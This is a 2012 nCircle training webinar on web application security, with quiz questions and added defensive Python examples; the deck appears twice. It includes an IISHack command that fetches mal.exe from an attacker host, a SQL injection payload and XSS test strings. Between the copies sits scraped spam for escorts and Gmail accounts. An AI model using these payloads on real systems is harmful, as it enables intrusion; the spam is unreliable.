Get Your Black Belt in Web Application Security
26 April 2012




© 2012 nCircle. All rights reserved.
Web Server and Web Applications Security

Why Web Servers and Web Applications are Hard to Defend

Why is attacking a web server or web applications one of the easiest attack methods?

  – On the perimeter
  – Accessible by anyone on the Internet
  – Need to balance functionality with security
  – Port 80 and port 443 (can't just block them)
  – Lack of security awareness of many web developers
  – High level of traffic; hard to distinguish an attack from high volumes of legitimate traffic

Typical Attack Steps against a Web Server

1. Reconnaissance (passive)
2. Scanning and enumeration (active)
3. Gaining Access (exploit)
4. Escalation of privilege
5. Maintain access
6. Covering tracks and placing backdoors

Two Methods of Attack: The Web Server and Web Applications

• Web Server Attacks
  – Vulnerabilities in the web server or web server configuration
    • Examples: Buffer Overflows, Traversals
• Web Application Attacks
  – Vulnerabilities in web applications
    • Command Injection
    • XSS (Cross Site Scripting)

Ichi (one)

With respect to defending against web attacks, what is the problem with port 80 with respect to security?

  a. It is the default TFTP port
  b. It can be closed
  c. It is not a well-known port
  d. It can't be blocked

Difficulty: Easy/Medium

Ni (two)

For an attack to work on a web server or a web application, what does it need to have?

  a. An exploit
  b. A risk
  c. A vulnerability
  d. A configuration

Difficulty: Easy/Medium

Congratulations on your new Yellow Belt!
You have attained the WebApp rank of 7th Kyu.

Web Server Attacks

Buffer Overflow Attack

A buffer overflow attack allows an attacker to overwrite code in the program's execution path and thus take control of the program to execute the attacker's code.

Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)

Example: IISHack.exe
Exploits the IIS http daemon buffer. Below is a sample:

    c: iishack www.WebserverA.com 80 www.hackserver.com/mal.exe

Web Server File System Traversal Attacks

• Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.
• By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.
• The attack is initiated by inserting special characters in URLs, for example the ../ sequence.
• Encoding can be used to bypass Web server filtering.

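The containment check a web server (or an application that serves files) should make, written here as an added example rather than anything from the nCircle deck: the request path is percent-decoded first, so the encoded form of ../ that the last bullet alludes to cannot slip past a filter that only looks for the literal characters. The document root /var/www/html and the request paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the example (constructed value, no trailing slash).
DOC_ROOT = "/var/www/html"


def naive_filter(url_path: str) -> bool:
    """Weak filter that only looks for a literal '../' in the raw URL.

    Returns True when the request is let through.  It is defeated by URL
    encoding ('%2e%2e%2f' contains no literal '../') and it also blocks
    harmless paths such as '/images/../index.html' that stay in the root.
    """
    return "../" not in url_path


def resolve_under_docroot(url_path: str, doc_root: str = DOC_ROOT):
    """Map a request path onto the filesystem, refusing anything that
    escapes the document root.  Returns the absolute path or None.

    Order matters:
      1. percent-decode once (the same decoding the server applies);
      2. reject NUL and other control characters, which can truncate the
         path in lower-level C string APIs;
      3. join onto the document root and normalise, so every '..' is
         resolved *before* the containment check;
      4. accept only the root itself or a path strictly below it.
    posixpath.normpath is pure string logic and does not follow symlinks;
    on a live filesystem repeat the check on os.path.realpath(candidate).
    """
    decoded = unquote(url_path)
    if any(ord(ch) < 0x20 for ch in decoded):
        return None
    candidate = posixpath.normpath(
        posixpath.join(doc_root, decoded.lstrip("/")))
    if candidate == doc_root or candidate.startswith(doc_root + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed sample requests: two legitimate, two traversal attempts.
    for path in ("/images/logo.png",
                 "/images/../index.html",
                 "/../../etc/passwd",
                 "/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{path:28} naive_filter={naive_filter(path)!s:5} "
              f"resolved={resolve_under_docroot(path)}")
```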
San (three)

Which one of the following is NOT one of the typical attacks used against a web server like Apache?

  a. ARP poisoning
  b. Buffer overflow
  c. Source disclosure
  d. File system traversal

Difficulty: Easy/Medium

Shi (four)

A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?

  a. Buffer boundary
  b. File system traversal
  c. Encryption
  d. File overflow

Difficulty: Easy/Medium

Congratulations on your new Blue Belt!
You have attained the WebApp rank of 4th Kyu.

Web Application Attacks

OWASP Top 10 (2010 List) – www.owasp.org

OWASP Top 10 Categories
A1-Injection
A2-Cross Site Scripting (XSS)
A3-Broken Authentication/Session Management
A4-Insecure Direct Object References
A5-Cross Site Request Forgery (CSRF)
A6-Security Misconfiguration
A7-Insecure Cryptographic Storage
A8-Failure to Restrict URL Access
A9-Insufficient Transport Layer Encryption
A10-Unvalidated Redirects and Forwards

Injection (Command Injection – OWASP A1)

• Occurs when untrusted data is sent to a command interpreter as part of a command or query.
• Cleverly formed data can trick the command interpreter into performing unintended commands or revealing unintended information.

• Examples of command injection:
  – SQL Injection
  – Script Injection
  – Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program.

SQL Injection (Valid Data)

As an example, the user enters Jill and Brown into two input fields on a web page.

The program takes this input into the CustID variable and dynamically creates the query string:

  'SELECT * FROM accounts WHERE customerID = Jill_Brown'

The program then sends this SQL query to the SQL database, and the SQL database then retrieves and displays Jill Brown's record as expected.

SQL Injection (Invalid Data)

The user enters Jane and Doe' OR '1'='1 on the web page.

The program takes this input and dynamically creates the query string:

  'SELECT * FROM accounts WHERE customerID = Jane_Doe' OR '1'='1'

The program sends this SQL query to the SQL database, and it then retrieves ALL of the records in the database accounts table – NOT as expected.

Defenses Against SQL Injection

• Prepared Statements (parameterized queries)
• Stored Procedures
• Escaping all user supplied input
• Least privilege
• White list input validation

Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)

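The Jill/Brown and Jane/Doe' OR '1'='1 inputs from the two preceding slides, run through both the string-built query and a parameterized one, with an allow-list check in front as the cheat sheet recommends. This is an added example, not code from the nCircle deck; the in-memory SQLite table and its three rows are constructed, and the customerID literal is quoted in the SQL so that the quote breakout shown on the slide applies.

```python
import re
import sqlite3

# Constructed rows standing in for the deck's "accounts" table.
ROWS = [
    ("Jill_Brown", 100.0),
    ("Jane_Doe", 250.0),
    ("Sam_Smith", 75.0),
]

# Allow list for a name field: letters and hyphens only.  A quote is not in
# the list, so the slide's payload is rejected before any SQL is built.
# (Deliberately narrow; parameterization, not this regex, is the primary
# defense, and real name fields need a wider list.)
NAME_RE = re.compile(r"^[A-Za-z-]{1,40}$")


def make_db():
    """In-memory SQLite database holding the sample accounts table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (customerID TEXT, balance REAL)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", ROWS)
    return con


def lookup_vulnerable(con, first, last):
    """The slide's construction: both fields glued into CustID and the
    result concatenated into the query text.  Whatever the user typed is
    parsed as SQL, so a quote ends the literal early and the rest of the
    input becomes part of the WHERE clause."""
    cust_id = f"{first}_{last}"
    sql = f"SELECT customerID FROM accounts WHERE customerID = '{cust_id}'"
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con, first, last):
    """Prepared statement: the SQL text is fixed and the value is bound
    separately, so the database engine never reads the input as SQL."""
    cust_id = f"{first}_{last}"
    sql = "SELECT customerID FROM accounts WHERE customerID = ?"
    return [row[0] for row in con.execute(sql, (cust_id,))]


def is_allowed_name(value):
    """White-list validation of one input field."""
    return NAME_RE.fullmatch(value) is not None


def lookup_defended(con, first, last):
    """Allow-list validation in front of the parameterized query.  Returns
    None for rejected input so the caller can log it instead of querying."""
    if not (is_allowed_name(first) and is_allowed_name(last)):
        return None
    return lookup_parameterized(con, first, last)


if __name__ == "__main__":
    con = make_db()
    for first, last in (("Jill", "Brown"), ("Jane", "Doe' OR '1'='1")):
        print(f"input: {first!r}, {last!r}")
        print("  vulnerable   :", lookup_vulnerable(con, first, last))
        print("  parameterized:", lookup_parameterized(con, first, last))
        print("  defended     :", lookup_defended(con, first, last))
```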
Cross Site Scripting (XSS – OWASP A2)

• Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. Injection usually occurs by inserting untrusted data in a user's browser via a web page request.

(Diagram labelled "Untrusted data" omitted)

Defenses Against XSS

Primary defense: Escaping untrusted data

"Escaping" is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.

Rule #0: Never put untrusted data in a web page except in allowed locations.

Rule #1: HTML escape before inserting untrusted data into HTML element content.

Rules #2 - #7: These rules deal with the exceptions, i.e. putting untrusted data in "unallowed" locations.

Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)

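Rule #0 and Rule #1 in code, as an added example that is not from the deck: the six-character escape the OWASP cheat sheet prescribes for element content, plus a check with Python's own HTML parser of what a browser would build from the rendered fragment. The page templates and the two untrusted inputs are constructed; the unquoted-attribute template is there only to show why Rule #0 restricts where untrusted data may be placed.

```python
from html.parser import HTMLParser

# Characters the OWASP XSS Prevention Cheat Sheet (Rule #1) says to escape
# before untrusted data is inserted into HTML element content.
HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
}


def html_escape(untrusted: str) -> str:
    """Replace each special character with its entity so the browser treats
    the whole string as text rather than as markup.  Call it exactly once."""
    return "".join(HTML_ESCAPES.get(ch, ch) for ch in untrusted)


# Hypothetical page fragments for the example (constructed, not from the deck).
ELEMENT_TEMPLATE = '<div class="comment">{data}</div>'
ATTR_UNQUOTED_TEMPLATE = "<div title={data}>hover me</div>"
ATTR_QUOTED_TEMPLATE = '<div title="{data}">hover me</div>'


class TagCollector(HTMLParser):
    """Records every start tag with its attributes, i.e. what a browser's
    parser would actually build from the rendered fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))


def parse_tags(fragment: str):
    collector = TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def render_unescaped(untrusted: str) -> str:
    """Before the fix: untrusted data dropped straight into element content."""
    return ELEMENT_TEMPLATE.format(data=untrusted)


def render_escaped(untrusted: str) -> str:
    """Rule #1 applied: the same data, escaped for element content."""
    return ELEMENT_TEMPLATE.format(data=html_escape(untrusted))


def render_attr_unquoted(untrusted: str) -> str:
    """Escaped, but placed in an unquoted attribute, a location Rule #0 does
    not allow: a plain space ends the value, so Rule #1 escaping is not
    enough and the parser sees a second, attacker-chosen attribute."""
    return ATTR_UNQUOTED_TEMPLATE.format(data=html_escape(untrusted))


def render_attr_quoted(untrusted: str) -> str:
    """Escaped and placed in a quoted attribute: both quote characters are
    escaped, so the data cannot terminate the attribute value."""
    return ATTR_QUOTED_TEMPLATE.format(data=html_escape(untrusted))


def script_tags(fragment: str) -> int:
    """Number of <script> elements the parser builds from the fragment."""
    return sum(1 for tag, _ in parse_tags(fragment) if tag == "script")


def attribute_names(fragment: str):
    """Attribute names of the first element in the fragment."""
    tags = parse_tags(fragment)
    return [name for name, _ in tags[0][1]] if tags else []


if __name__ == "__main__":
    # Constructed untrusted inputs: one aimed at element content, one at an
    # unquoted attribute (it contains none of the six escaped characters).
    script_input = '<script>alert("xss")</script>'
    attr_input = "x onmouseover=alert(1)"
    for label, page in (("unescaped", render_unescaped(script_input)),
                        ("escaped  ", render_escaped(script_input))):
        print(label, script_tags(page), page)
    for label, page in (("unquoted attr", render_attr_unquoted(attr_input)),
                        ("quoted attr  ", render_attr_quoted(attr_input))):
        print(label, attribute_names(page), page)
```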
Broken Authentication and Session Management (OWASP A3)

• Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented, allowing an attacker to assume someone else's identity.

Defenses Against Broken Authentication and Session Management

• Secure management of session identifiers
  – Do not put session identifiers in the URL
  – Session IDs should have a timeout feature
• Do not allow the login process to execute from an unencrypted page
• Password Change Controls
• Password use / strength / storage

• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)

Go (five)

A web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?

  a. Sequence infiltration
  b. SQL injection
  c. Cookie poisoning
  d. Hidden parameter exploit

Difficulty: Easy/Medium

Roku (six)

What is one of the defenses against SQL Injection?

  a. Least Privilege
  b. Black list input validation
  c. Sanitization
  d. Proxy manipulation

Difficulty: Easy/Medium

Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.

Web Server and Web Application Defense Tools

Web Server and Application Defense Tools (1 of 2)

• Scanning and mapping tools
  • Ping, Nping, Nmap, Amap, SuperScan, …
• Vulnerability and Web vulnerability scanners
  • Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, …
• Web proxy tools
  • WebScarab, Paros Proxy, Burp Proxy, …
• Web mapping/ripping tools
  • Black Widow, Wget, skipfish, …
• Communication/data transfer tools
  • Ncat, telnet, ftp, …
• Exploits, Exploit Kits, and Exploit Frameworks
  • Program for a specific exploit
  • Pen Test frameworks: Metasploit, Core Impact, CANVAS

Web Server and Application Defense Tools (2 of 2)

• Password cracking tools
  • John the Ripper, Cain and Abel, PRTK, ophcrack, …
• Web Source Code examination tools
  • Instant Source, Firebug, …
• SQL Injection Tools
  • BSQL Hacker, The Mole, sqlmap, Pangolin, …

Network Defense Tools (Protecting the Web Server)

• Routers
• Firewalls (network layer)
• Web Application Firewalls (application layer)
• Web Application Proxies
• Honeypots/Honeynets
• Logging
• Intrusion Detection/Prevention System (IDS/IPS)
• Host-based Intrusion Detection (HIDS), e.g. file integrity detection
• Backups
• Computer Forensic Tools

Web Server Protection

• Protect the Web Server
• Vulnerability Assessment
• Harden the Web Server
  – Host (OS)
  – Web Server
  – Web Services
• Logging
• Backups and recovery

Place the Web Server in an Untrusted Zone

Security Harden the Web Server (1 of 2)

• Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)

• Host (OS) hardening

• Web Server hardening
  – Use tools like IIS Lockdown and URLscan
  – Harden each service you offer on your Web Server
  – Disable / remove anything you don't use or need: accounts, ports, services, plug-ins
  – Configuration settings
  – Permissions

Security Harden the Web Server (2 of 2)

• Authentication and Access Control
  – File and directory permissions
  – Account password and lockout policies

• Logging and Audit Policies

• Vulnerability and Compliance Assessments
  – Vulnerability scanner
  – Web application vulnerability scanner
  – Configuration scanner
  – Audits for compliance assessments
  – Penetration testing / manual testing

Web Server Attack Countermeasures

• Buffer Overflow
  – Can be mitigated by conducting frequent scans for server vulnerabilities
  – Promptly acquiring and installing patches and service packs
  – Implementing effective firewalls
  – Applying web configuration lockdown utilities

• File System Traversal
  – Promptly apply patches and updates to the web server
  – Restrict privileges to executable programs such as cmd.exe
  – Set file and directory permissions
  – Locate the system software on a different disk drive from the web site software and content directory.

Shichi (seven)

Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?

  a. Banner grabbing
  b. Defeating authentication
  c. Scanning
  d. Password Cracking

Difficulty: Medium/Hard

Hachi (eight)

What is a good tool to help harden an IIS web server? (choose the best answer)

  a. Cain and Abel
  b. URLscan
  c. ncat
  d. WebScarab

Difficulty: Medium/Hard

Congratulations on your new Black Belt!
You have attained the WebApp rank of 1st Dan.

Resources

• OWASP (Open Web Application Security Project)
  www.owasp.org
• NIST (National Institute of Standards and Technology)
  www.nist.gov
• SANS
  www.sans.org
• Web Application Security Consortium (WASC)
  www.webappsec.org
• SecTools.org
  http://sectools.org

Questions?
Organizational Structure Running A Successful BusinessOrganizational Structure Running A Successful Business
Organizational Structure Running A Successful Business
 
Intro to BCG's Carbon Emissions Benchmark_vF.pdf
Intro to BCG's Carbon Emissions Benchmark_vF.pdfIntro to BCG's Carbon Emissions Benchmark_vF.pdf
Intro to BCG's Carbon Emissions Benchmark_vF.pdf
 
Kenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith PereraKenya Coconut Production Presentation by Dr. Lalith Perera
Kenya Coconut Production Presentation by Dr. Lalith Perera
 
Independent Call Girls Andheri Nightlaila 9967584737
Independent Call Girls Andheri Nightlaila 9967584737Independent Call Girls Andheri Nightlaila 9967584737
Independent Call Girls Andheri Nightlaila 9967584737
 
Buy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail AccountsBuy gmail accounts.pdf Buy Old Gmail Accounts
Buy gmail accounts.pdf Buy Old Gmail Accounts
 
Call Us ➥9319373153▻Call Girls In North Goa
Call Us ➥9319373153▻Call Girls In North GoaCall Us ➥9319373153▻Call Girls In North Goa
Call Us ➥9319373153▻Call Girls In North Goa
 
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort ServiceCall US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
Call US-88OO1O2216 Call Girls In Mahipalpur Female Escort Service
 
8447779800, Low rate Call girls in Saket Delhi NCR
8447779800, Low rate Call girls in Saket Delhi NCR8447779800, Low rate Call girls in Saket Delhi NCR
8447779800, Low rate Call girls in Saket Delhi NCR
 
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / NcrCall Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
Call Girls in DELHI Cantt, ( Call Me )-8377877756-Female Escort- In Delhi / Ncr
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
 
Investment in The Coconut Industry by Nancy Cheruiyot
Investment in The Coconut Industry by Nancy CheruiyotInvestment in The Coconut Industry by Nancy Cheruiyot
Investment in The Coconut Industry by Nancy Cheruiyot
 
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
8447779800, Low rate Call girls in Kotla Mubarakpur Delhi NCR
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?
 
Japan IT Week 2024 Brochure by 47Billion (English)
Japan IT Week 2024 Brochure by 47Billion (English)Japan IT Week 2024 Brochure by 47Billion (English)
Japan IT Week 2024 Brochure by 47Billion (English)
 

nCircle Webinar: Get your Black Belt

  • 1. Get Your Black Belt in Web Application Security 26 April 2012 © 2012 nCircle. All rights reserved.
  • 2. Web Server and Web Applications Security
  • 3. Why Web Servers and Web Applications are hard to Defend
    Why is attacking a web server or web applications one of the easiest attack methods?
    – On the perimeter
    – Accessible by anyone on the Internet
    – Need to balance functionality with security
    – Port 80 and port 443 (can't just block them)
    – Lack of security awareness of many web developers
    – High level of traffic. Hard to distinguish an attack from high volumes of legitimate traffic
  • 4. Typical Attack Steps against a Web Server
    1. Reconnaissance (passive)
    2. Scanning and enumeration (active)
    3. Gaining Access (exploit)
    4. Escalation of privilege
    5. Maintain access
    6. Covering tracks and placing backdoors
  • 5. Two Methods of Attack: The Web Server and Web Applications
    • Web Server Attacks
      – Vulnerabilities in the web server or web server configuration
        • Examples: Buffer Overflows, Traversals
    • Web Application Attacks
      – Vulnerabilities in web applications
        • Command Injection
        • XSS (Cross Site Scripting)
  • 6. Ichi (one)
    With respect to defending against web attacks, what is the problem with port 80 with respect to security?
    a. It is the default TFTP port
    b. It can be closed
    c. It is not a well-known port
    d. It can't be blocked
    Difficulty: Easy/Medium
  • 7. Ni (two)
    For an attack to work on a web server or a web application, what does it need to have?
    a. An exploit
    b. A risk
    c. A vulnerability
    d. A configuration
    Difficulty: Easy/Medium
  • 8. Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.
  • 9. Web Server Attacks
  • 10. Buffer Overflow Attack
    A buffer overflow attack allows an attacker to overwrite code in the program's execution path and thus take control of the program to execute the attacker's code.
    Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)
    Example: IISHack.exe exploits the IIS HTTP daemon buffer. Below is a sample:
    c: iishack www.WebserverA.com 80 www.hackserver.com/mal.exe
  • 11. Web Server File System Traversal Attacks
    • Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.
    • By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.
    • Attack is initiated by inserting special characters in URLs, for example, the ../ sequence.
    • Encoding can be used to bypass Web server filtering.
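An added example, not from the nCircle deck, of the check a web server or application should make on a requested path before touching the file system: decode first, then normalize, then confirm the result is still inside the document root. The document root, the request paths and the naive filter shown beside it are constructed for this example; the naive filter illustrates why the slide says encoding bypasses filtering on the raw URL.

```python
"""Added example (not from the nCircle deck): resolving a requested URL path
against the web document root and rejecting file system traversal, including
the URL-encoded variants that defeat a filter applied to the raw request."""
import posixpath
from typing import Optional
from urllib.parse import unquote

DOC_ROOT = "/var/www/html"  # constructed document root for the example


def naive_filter(raw_path: str) -> bool:
    """The kind of check the slide says encoding bypasses: it looks for a
    literal '../' in the *undecoded* request path. Returns True if allowed."""
    return "../" not in raw_path


def safe_resolve(raw_path: str) -> Optional[str]:
    """Decode, normalize, then contain. Returns the absolute server-side path
    the request maps to, or None if it would escape DOC_ROOT."""
    # The query string never reaches the file system; drop it first so an
    # encoded '?' in the path itself is not mistaken for one.
    path_part = raw_path.split("?", 1)[0]
    decoded = unquote(path_part)          # '%2e%2e%2f' -> '../', '%00' -> NUL
    if "\x00" in decoded:                 # NUL truncates C-string file names
        return None
    # Join to the root and collapse '.', '..' and repeated slashes. The
    # normalization must happen on the decoded form, never before decoding.
    full = posixpath.normpath(posixpath.join(DOC_ROOT, decoded.lstrip("/")))
    # Containment check: the result must be the root itself or live under it.
    if full != DOC_ROOT and not full.startswith(DOC_ROOT + "/"):
        return None
    return full
```

Servers decode a request once; an application that decodes a second time on its own must repeat the containment check on the result it will actually open.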
  • 12. San (three)
    Which one of the following is NOT one of the typical attacks used against a web server like Apache?
    a. ARP poisoning
    b. Buffer overflow
    c. Source disclosure
    d. File system traversal
    Difficulty: Easy/Medium
  • 13. Shi (four)
    A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?
    a. Buffer boundary
    b. File system traversal
    c. Encryption
    d. File overflow
    Difficulty: Easy/Medium
  • 14. Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.
  • 15. Web Application Attacks
  • 16. OWASP Top 10 (2010 List) – www.owasp.org
    OWASP Top 10 Categories
    A1-Injection
    A2-Cross Site Scripting (XSS)
    A3-Broken Authentication/Session Management
    A4-Insecure Direct Object References
    A5-Cross Site Request Forgery (CSRF)
    A6-Security Misconfiguration
    A7-Insecure Cryptographic Storage
    A8-Failure to Restrict URL Access
    A9-Insufficient Transport Layer Encryption
    A10-Unvalidated Redirects and Forwards
  • 17. Injection (Command Injection – OWASP A1)
    • Occurs when untrusted data is sent to a command interpreter as part of a command or query.
    • Cleverly formed data can trick the command interpreter into performing unintended commands or revealing unintended information.
    • Examples of command injection:
      – SQL Injection
      – Script Injection
    • Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program.
  • 18. SQL Injection (Valid Data)
    As an example, the user enters Jill and Brown into two input fields on a web page.
    The program takes this input into the CustID variable and dynamically creates the query string:
    'SELECT * FROM accounts WHERE customerID = Jill_Brown'
    The program then sends this SQL query to the SQL database, and the SQL database then retrieves and displays Jill Brown's record as expected.
  • 19. SQL Injection (Invalid Data)
    The user enters Jane and Doe' OR '1'='1 on the web page.
    The program takes this input and dynamically creates the query string:
    'SELECT * FROM accounts WHERE customerID = Jane_Doe' OR '1'='1'
    The program sends this SQL query to the SQL database, and it then retrieves ALL of the records in the database accounts table – NOT as expected.
  • 20. Defenses Against SQL Injection
    • Prepared Statements (parameterized queries)
    • Stored Procedures
    • Escaping all user supplied input
    • Least privilege
    • White list input validation
    Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)
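An added example, not from the nCircle deck, that runs the lookups from slides 18 and 19 against a constructed in-memory SQLite table: the dynamically built query string beside a prepared statement, plus the white list input validation from slide 20 in front of it. The `accounts` schema, its rows and the name allow list are constructed for the example.

```python
"""Added example (not from the nCircle deck): the deck's customer lookup built
two ways, dynamic string concatenation beside a prepared statement, run
against a constructed in-memory SQLite 'accounts' table."""
import re
import sqlite3

# Constructed allow list: letters and hyphens only. This is a narrowing
# policy for this field; it is the prepared statement, not the regex, that
# keeps a quote character in the input from becoming SQL syntax.
NAME_RE = re.compile(r"^[A-Za-z-]{1,40}$")


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three customers, keyed as on the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (customerID TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [("Jill_Brown", 100), ("Jane_Doe", 250), ("Bob_Smith", 75)],
    )
    return conn


def lookup_dynamic(conn, first: str, last: str):
    """Vulnerable form from slide 19: the program 'dynamically creates the
    query string', so a quote in the input closes the literal and the rest
    of the input is executed as SQL (Doe' OR '1'='1 matches every row)."""
    query = f"SELECT * FROM accounts WHERE customerID = '{first}_{last}'"
    return conn.execute(query).fetchall()


def lookup_prepared(conn, first: str, last: str):
    """Slide 20, defense 1: a parameterized query. The SQL text is fixed and
    the value travels separately, so quotes inside it stay data."""
    return conn.execute(
        "SELECT * FROM accounts WHERE customerID = ?", (f"{first}_{last}",)
    ).fetchall()


def lookup_validated(conn, first: str, last: str):
    """Slide 20, white list validation in front of the prepared statement:
    input outside the allow list is refused before any query is built.
    Returns None on rejection."""
    if not (NAME_RE.match(first) and NAME_RE.match(last)):
        return None
    return lookup_prepared(conn, first, last)
```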
  • 21. Cross Site Scripting (XSS – OWASP A2)
    • Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted web sites. Injection usually occurs by inserting untrusted data into a user's browser via a web page request.
  • 22. Defenses Against XSS
    Primary defense: Escaping untrusted data
    "Escaping" is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.
    Rule #0: Never put untrusted data (in a web page) except in allowed locations
    Rule #1: HTML escape before inserting untrusted data into HTML element content
    Rules #2 - #7: These rules deal with exceptions if you put untrusted data in "unallowed" locations
    Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
  • 23. Broken Authentication and Session Management (OWASP A3)
    • Web application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented, allowing an attacker to assume someone else's identity.
  • 24. Defenses Against Broken Authentication and Session Management
    • Secure management of session identifiers
      – Do not put session identifiers in the URL
      – Session IDs should have a timeout feature
    • Do not allow the login process to execute from an unencrypted page
    • Password change controls
    • Password use / strength / storage
    • Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
  • 25. Go (five)
    A web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?
    a. Sequence infiltration
    b. SQL injection
    c. Cookie poisoning
    d. Hidden parameter exploit
    Difficulty: Easy/Medium
  • 26. Roku (six)
    What is one of the defenses against SQL Injection?
    a. Least Privilege
    b. Black list input validation
    c. Sanitization
    d. Proxy manipulation
    Difficulty: Easy/Medium
  • 27. Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.
  • 28. Web Server and Web Application Defense Tools
  • 29. Web Server and Application Defense Tools (1 of 2)
    • Scanning and mapping tools
      • Ping, Nping, Nmap, Amap, SuperScan, …
    • Vulnerability and Web vulnerability scanners
      • Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, …
    • Web proxy tools
      • WebScarab, Paros Proxy, Burp Proxy, …
    • Web mapping/ripping tools
      • Black Widow, Wget, skipfish, …
    • Communication/data transfer tools
      • Ncat, telnet, ftp, …
    • Exploits, Exploit Kits, and Exploit Frameworks
      • Program for a specific exploit
      • Pen Test frameworks: Metasploit, Core Impact, CANVAS
  • 30. Web Server and Application Defense Tools (2 of 2)
    • Password cracking tools
      • John the Ripper, Cain and Abel, PRTK, ophcrack, …
    • Web source code examination tools
      • Instant Source, Firebug, …
    • SQL Injection tools
      • BSQL Hacker, The Mole, sqlmap, Pangolin, …
  • 31. Network Defense Tools (Protecting the Web Server)
    • Routers
    • Firewalls (network layer)
    • Web Application Firewalls (application layer)
    • Web Application Proxies
    • Honeypots/Honeynets
    • Logging
    • Intrusion Detection/Prevention System (IDS/IPS)
    • Host-based Intrusion Detection (HIDS), e.g. file integrity detection
    • Backups
    • Computer Forensic Tools
  • 32. Web Server Protection
    • Protect the Web Server
    • Vulnerability Assessment
    • Harden the Web Server
      – Host (OS)
      – Web Server
      – Web Services
    • Logging
    • Backups and recovery
  • 33. Place the Web Server in an Untrusted Zone
  • 34. Security Harden the Web Server (1 of 2)
    • Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)
    • Host (OS) hardening
    • Web Server hardening
      – Use tools like IIS Lockdown and URLscan
      – Harden each service you offer on your Web Server
      – Disable / remove anything you don't use or need: accounts, ports, services, plug-ins
      – Configuration settings
      – Permissions
  • 35. Security Harden the Web Server (2 of 2)
    • Authentication and Access Control
      – File and directory permissions
      – Account password and lockout policies
    • Logging and Audit Policies
    • Vulnerability and Compliance Assessments
      – Vulnerability scanner
      – Web application vulnerability scanner
      – Configuration scanner
      – Audits for compliance assessments
      – Penetration testing / manual testing
  • 36. Web Server Attack Countermeasures
    • Buffer Overflow
      – Can be mitigated by conducting frequent scans for server vulnerabilities
      – Promptly acquiring and installing patches and service packs
      – Implementing effective firewalls
      – Applying web configuration lockdown utilities
    • File System Traversal
      – Promptly apply patches and updates to the web server
      – Restrict privileges to executable programs such as cmd.exe
      – Set file and directory permissions
      – Locate the system software on a different disk drive from the web site software and content directory.
